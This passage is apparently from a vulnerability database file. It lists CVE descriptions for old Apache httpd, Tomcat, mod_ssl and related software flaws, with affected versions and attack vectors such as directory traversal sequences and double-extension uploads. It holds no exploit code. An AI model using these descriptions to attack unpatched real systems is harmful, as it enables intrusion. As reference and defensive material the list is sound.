12822| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
12823| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
12824| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
12825| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
12826| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
12827| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
12828| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allow remote attackers to execute arbitrary code via various vectors, including the username.
12829| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
12830| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
12831| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
12832| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
12833| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
12834| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
12835| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
12836| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
12837| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
12838| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
12839| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
12840| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
12841| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
12842| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
12843| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
12844| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
12845| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
12846| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
12847| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
12848| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
12849| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
12850| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
12851| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
12852| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
12853| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
12854| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
12855| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
12856| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
12857| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
12858| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
12859| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
12860| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
12861| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
12862| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
12863| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
12864| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
12865| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
12866| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
12867| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
12868| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
12869| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
12870| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
12871| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
12872| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
12873| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
12874| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
12875| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
12876| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
12877| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
12878| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
12879| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
12880| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
12881| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
12882| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
12883| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
12884| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
12885| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
12886| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
12887| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
12888| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
12889| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
12890| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
12891| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
12892| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
12893| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
12894| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
12895| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
12896| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
12897| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
12898| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
12899| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
12900| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child process IDs (PID).
12901| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
12902| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
12903| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
12904| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
12905| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
12906| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
12907| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
12908| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
12909| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
12910| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
12911| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
12912| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
12913| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
12914| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
12915| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
12916| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
12917| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
12918| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to bypass intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
12919| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
12920| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
12921| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
12922| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
12923| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
12924| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
12925| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
12926| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
12927| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
12928| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
12929| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
12930| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
12931| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
12932| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
12933| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
12934| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
12935| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
12936| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
12937| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
12938| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
12939| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
12940| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
12941| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
12942| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
12943| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
12944| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
12945| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
12946| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
12947| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
12948| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
12949| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
12950| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
12951| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
12952| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
12953| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
12954| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
12955| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
12956| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
12957| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
12958| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
